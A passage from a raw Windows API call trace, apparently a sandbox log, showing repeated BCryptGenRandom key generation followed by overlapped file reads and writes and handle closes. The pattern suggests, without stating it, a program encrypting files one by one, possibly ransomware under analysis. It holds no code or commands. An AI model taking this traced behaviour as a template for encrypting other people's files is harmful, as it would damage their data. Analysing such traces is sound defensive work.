_Size=0x4) returned 0x1fa2ed8 [0209.949] free (_Block=0x1fa91d0) [0209.949] free (_Block=0x1fa2ed8) [0209.949] free (_Block=0x1fa90b8) [0209.949] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.028] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x888, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0210.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.053] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xaeb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0210.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.081] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x344, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0210.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.108] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0210.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.116] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0210.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.117] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0210.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.118] CloseHandle (hObject=0xec) returned 1 [0210.118] free (_Block=0x3df0008) [0210.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.132] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.132] free (_Block=0x3e305b8) [0210.132] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.132] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.132] free (_Block=0x1fa91d0) [0210.132] free (_Block=0x1fa2ed8) [0210.132] free (_Block=0x1fa90b8) [0210.132] WriteFile (in: hFile=0x238, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.155] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.155] free (_Block=0x3e305b8) [0210.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.155] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.155] free (_Block=0x1fa91d0) [0210.155] free (_Block=0x1fa2ed8) [0210.156] free (_Block=0x1fa90b8) [0210.156] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.170] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0210.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.189] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.189] free (_Block=0x3e305b8) [0210.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.189] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.189] free (_Block=0x1fa91d0) [0210.189] free (_Block=0x77d7a8) [0210.189] free (_Block=0x1fa90b8) [0210.190] WriteFile (in: hFile=0x238, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.191] ReadFile (in: hFile=0x238, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x24e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.267] CloseHandle (hObject=0x338) returned 1 [0210.268] free (_Block=0x3d70450) [0210.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.268] CloseHandle (hObject=0x308) returned 1 [0210.268] free (_Block=0x3e70008) [0210.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.269] CloseHandle (hObject=0xec) returned 1 [0210.269] free (_Block=0x3ef0008) [0210.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.281] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.283] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.283] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.283] free (_Block=0x3e305b8) [0210.283] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.283] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.283] free (_Block=0x1fa91d0) [0210.284] free (_Block=0x1fa2ed8) [0210.284] free (_Block=0x1fa90b8) [0210.284] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.321] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.326] CloseHandle (hObject=0xec) returned 1 [0210.326] free (_Block=0x3df0008) [0210.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.330] CloseHandle (hObject=0xec) returned 1 [0210.330] free (_Block=0x3df0008) [0210.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.349] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.349] free (_Block=0x3e305b8) [0210.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.349] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.349] free (_Block=0x1fa91d0) [0210.349] free (_Block=0x1fa2ed8) [0210.349] free (_Block=0x1fa90b8) [0210.349] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.353] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.356] CloseHandle (hObject=0xec) returned 1 [0210.357] free (_Block=0x3df0008) [0210.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.360] CloseHandle (hObject=0xec) returned 1 [0210.361] free (_Block=0x3df0008) [0210.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.373] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.373] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.374] free (_Block=0x3e305b8) [0210.374] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.374] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.374] free (_Block=0x1fa91d0) [0210.374] free (_Block=0x1fa2ed8) [0210.374] free (_Block=0x1fa90b8) [0210.374] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.376] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x10f80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.377] CloseHandle (hObject=0xec) returned 1 [0210.377] free (_Block=0x3df0008) [0210.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.385] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.385] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.385] free (_Block=0x3e305b8) [0210.385] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.385] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.386] free (_Block=0x1fa91d0) [0210.386] free (_Block=0x1fa2ed8) [0210.386] free (_Block=0x1fa90b8) [0210.386] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.387] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.402] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x69e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.402] CloseHandle (hObject=0xec) returned 1 [0210.402] free (_Block=0x3df0008) [0210.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.410] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.410] free (_Block=0x3e305b8) [0210.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.410] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.411] free (_Block=0x1fa91d0) [0210.411] free (_Block=0x1fa2ed8) [0210.411] free (_Block=0x1fa90b8) [0210.411] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.411] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.427] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x165e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.441] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb390, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff 